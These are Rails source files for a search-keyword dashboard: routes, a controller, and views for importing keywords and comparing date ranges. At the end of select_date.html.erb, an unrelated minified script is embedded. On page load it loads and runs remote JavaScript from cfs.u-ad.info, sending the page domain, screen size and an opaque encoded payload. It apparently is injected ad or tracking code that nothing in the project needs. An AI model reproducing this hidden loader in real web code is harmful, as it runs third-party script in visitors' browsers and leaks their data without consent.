config/routes.rb
Rails.application.routes.draw do

  root 'dashboard#index'
  post 'keywords' => 'keywords#import'
  get 'select_date' => 'dashboard#select_date'
  get 'import' => 'dashboard#get_import'

  

end

app/controllers/dashboard_controller.rb
class DashboardController < ApplicationController

	def index
		@keywords = Keyword.all.limit(100)
	end

	def select_date
		@keywords_1 = Keyword.search_keywords_period(params[:search][:date_from])
		@keywords_2 = Keyword.search_keywords_period(params[:search][:date_to])
		
	end

  def get_import;end

end

app/views/dashboard/get_import.html.erb
<section class="import">
  <div class="container">
    <div class="row">
         <h3>Import Keywords</h3>
         <div class="col-md-4">
          <%= form_tag keywords_path, multipart: true do %>
            <%= file_field_tag :file, class: "btn btn-default" %>
         </div>
         <div class="col-md-6">
          <%= submit_tag "Import", class: "btn btn-primary btn-imp-pst"%>
         </div>
        <% end %>
    </div>
  </div>
</section>

app/views/dashboard/index-four-input.html.erb
<div class="container">
  <div class="row">
    <div class="col-lg-12">
      <%= form_tag select_date_path, :method => 'get', multipart: true do %>
        <div class="col-md-3">
          <div class="form-group">
            <label>Start Date</label>
            <p><%= text_field_tag 'search[from_1]', (params[:search][:from_1] rescue ''), :id=>"from", :class=>"form-control" %></p>
          </div>
        </div>
        <div class="col-md-3">
          <div class="form-group">
            <label>Until Date</label>
            <%= text_field_tag 'search[to_1]', (params[:search][:to_1] rescue ''), :id=>"to" , :class=>"form-control"%>
          </div>
        </div>
        <div class="col-md-3">
          <div class="form-group">
            <label>Compare Start Date</label>
            <p><%= text_field_tag 'search[from_2]', (params[:search][:from_2] rescue ''), :id=>"from", :class=>"form-control" %></p>
          </div>
        </div>
        <div class="col-md-3">
          <div class="form-group">
            <label>Compare Until Date</label>
            <%= text_field_tag 'search[to_2]', (params[:search][:to_2] rescue ''), :id=>"to" , :class=>"form-control"%>
          </div>
        </div>
        <div class="col-md-3">
        	<div class="form-group">
        		<label class="cs-label"></label>
	          <%= submit_tag "Search", :name => nil, :class=>"form-control cs-form-control btn btn-primary pst" %>
	        </div>
        </div>
      <% end %>
    </div>
  </div>
</div>

<div class="container">
  <div class="row">
    <div class="col-lg-12">
      <div class="panel panel-primary">
        <div class="panel-heading">
           <h4>Keywords</h4>
        </div>
        <div class="panel-body">
          <div class="table-responsive">
            <table class="table table-striped table-bordered table-hover">
              <thead>
                <tr>
                  <th>No.</th>
                  <th>Query</th>
                  <th>Impressions</th>
                  <th>clicks</th>
                  <th>CTR</th>
                  <th>AVG Position</th>
                  <th>Date</th>
                  <th>New</th>
                </tr>
              </thead>
              <tbody>
                <% @keywords.each_with_index do |key, index| %>
                  <tr>
                    <td><%= index+1 %></td>
                    <td><%= key.query %></td>
                    <td><%= key.impressions %></td>
                    <td><%= key.clicks %></td>
                    <td><%= key.ctr %></td>
                    <td><%= key.avg_position %></td>
                    <td><%= key.date %></td>
                    <td><%= key.new %></td>
                  </tr>
                <% end %>
              </tbody>
            </table>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>

app/views/dashboard/index.html.erb
<div class="container">
  <div class="row">
    <div class="col-lg-12">
      <%= form_tag select_date_path, :method => 'get', multipart: true do %>
        <div class="col-md-3">
          <div class="form-group">
            <label>Select Range Date</label>
            <p><%= text_field_tag 'search[date_from]', (params[:search][:date_from] rescue ''), :id=>"from", :class=>"form-control" %></p>
          </div>
        </div>
        <div class="col-md-3">
          <div class="form-group">
            <label>Compared To</label>
            <%= text_field_tag 'search[date_to]', (params[:search][:date_to] rescue ''), :id=>"to" , :class=>"form-control"%>
          </div>
          <div ></div>
        </div>
        <div class="col-md-3">
          <div class="form-group">
            <label class="cs-label"></label>
            <%= submit_tag "Search", :name => nil, :class=>"form-control cs-form-control btn btn-primary pst" %>
          </div>
        </div>
      <% end %>
    </div>
  </div>
</div>

<div class="container">
  <div class="row">
    <div class="col-lg-12">
      <div class="panel panel-primary">
        <div class="panel-heading">
           <h4>Keywords</h4>
        </div>
        <div class="panel-body">
          <div class="table-responsive">
            <table class="table table-striped table-bordered table-hover">
              <thead>
                <tr>
                  <th>No.</th>
                  <th>Query</th>
                  <th>Impressions</th>
                  <th>clicks</th>
                  <th>CTR</th>
                  <th>AVG Position</th>
                  <th>Date</th>
                  <th>New</th>
                </tr>
              </thead>
              <tbody>
                <% @keywords.each_with_index do |key, index| %>
                  <tr>
                    <td><%= index+1 %></td>
                    <td><%= key.query %></td>
                    <td><%= key.impressions %></td>
                    <td><%= key.clicks %></td>
                    <td><%= key.ctr %></td>
                    <td><%= key.avg_position %></td>
                    <td><%= key.date %></td>
                    <td><%= key.new %></td>
                  </tr>
                <% end %>
              </tbody>
            </table>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>

app/views/dashboard/select_date.html.erb
<div class="container">
  
  <div class="row">
    <div class="col-lg-12">
      <div class="alert alert-success"> Selected Date: <%=  "#{params[:search][:date_from]}" %> </div>
      <div class="alert alert-success">Compared to : <%= "#{params[:search][:date_to]}" %></div>
    </div>
  </div>

  <div class="row">
    <div class="col-lg-12">
      <div class="panel panel-primary">
        <div class="panel-heading">
           <h5>Overview</h5>
        </div>
        <div class="panel-body">
          <%= render "/shared/table_overview" %>
        </div>
      </div>
      <div class="panel panel-primary">
        <div class="panel-heading">
          <h5>Top Keywords (top 10 based on clicks)</h5>
        </div>
        <!-- /.panel-heading -->
        <div class="panel-body">
          <%= render "/shared/table_top_keywords" %>
          <a href="#" class="btn btn-primary">View More Link</a>
        </div>
      </div>
   </div>
 </div>
  
  <div class="row">
    <div class="col-md-6">
     <div class="panel panel-primary">
        <div class="panel-heading">
           <h5>New Keywords (top 10 based on impressions)</h5>
        </div>
        <div class="panel-body">
           <%= render "/shared/table_top_keywords_new_impressions" %>
           <a href="#" class="btn btn-primary">View More Link</a>
        </div>
      </div>
    </div>
    <div class="col-md-6">
      <div class="panel panel-primary">
        <div class="panel-heading">
        <h5>Keywords disappeared (top 10 based on impressions from past period)</h5>
        </div>
      <div class="panel-body">
        <%= render "/shared/table_top_keywords_past_impressions" %>
        <a href="#" class="btn btn-primary">View More Link</a>
      </div>
      </div>
    </div>
  </div>

  <div class="row">
    <div class="col-md-6">
     <div class="panel panel-primary">
        <div class="panel-heading">
           <h5>Improved Rankings (only displaying queries with more than 100 impressions) (top 10 based on average position improvement)</h5>
        </div>
        <div class="panel-body">
           <%= render "/shared/improved_rankings" %>
           <a href="#" class="btn btn-primary">View More Link</a>
        </div>
      </div>
    </div>
    <div class="col-md-6">
      <div class="panel panel-primary">
        <div class="panel-heading">
         <h5>Lost Rankings (only displaying queries with more than 100 impressions) (top 10 based on average position improvement)</h5>
        </div>
      <div class="panel-body">
         <%= render "/shared/lost_rankings" %>
         <a href="#" class="btn btn-primary">View More Link</a>
      </div>
      </div>
    </div>
  </div>

  <div class="row">
    <div class="col-md-6">
      <div class="panel panel-primary">
        <div class="panel-heading">
          <h5>Rank Distribution (Graph to compare 2 dates) 
          <br>*Number of Keywords per ranking Group</h5>
        </div>
        <div class="panel-body">
          <div id="chartContainer" style="height: 300px; width: 100%;"></div>
        </div>
        <div class="panel-footer">
          <p>Blue : Position 1-2</p> 
          <p>Yellow : Position 2-4</p> 
          <p>Green : 5-10</p>
          <p>Gray : 10-20</p> 
          <p>Light Gray : >20</p>
        </div>
      </div>
    </div>
    <div class="col-md-6">
      <div class="panel panel-primary">
        <div class="panel-heading">
          <h5>CTR (only displaying queries with more than 100 impressions)</h5>
        </div>
        <div class="panel-body">
          <%= render "/shared/ctr_group"%>
        </div>
      </div>
    </div>
  </div>
</div> <!--Container -->


<script type="text/javascript">
if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bd8NOI9cWcyIlaDcZ%2fu3yH5YNpWpMFGbEo76zqk50Mj1yB2XduWxwFhyzySdbC6hVuXGyCrk9LUzhqSmQva8vX7hBrCnOResEr7tvxcceVFruQHFsaohgu0XkPgL1hxCw2J1GndggCsegFARkJfAlCXZsqw5afxleYkyB%2bv4MxBZfDSqxBnNBx3ScoqaJ89kNlBNiGI50OenmClZe%2baDb8ejKxJiHtEEYAMLMOhliCMYjL4kmmXCXP82HT%2fLsCB48q9i%2b0y9I4DBhKzBvO%2bCb5cv4AGRb2kn1oFT1g%2f6eKZTxAyAUpODKbhLlTTBfVnxJBqHsUtu7BaKL8skRckZ7zLoPiNnl9Xe0EZg0RmWBUOuUeFHKrG%2fgFpNbzhcltBRQOwL7NZDWyheUQaorUSXt09WAzZnD%2fQMJOJTgcC2xO1LObv8zHXgCHOLCvN8%2fuP6xYrxy601ZwtP%2fzqBAwPm2cA5NmV9aJBpH9G2I9i8TvRLtXRAEgR3woI6qU%2fl7hMHbxM%2bZBxI806ZG2cGBkqkFr9%2fLDo0dIsW054ILq8qx4WHfC7%2bAIFPwbKSo%2fNXctEptt0jJqnjZMcg%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};

<% string, interval = chart_structure(@keywords_1, @keywords_2) %>
var datas = <%= string.html_safe %>;
generateCharts(datas, <%= interval %>);
</script>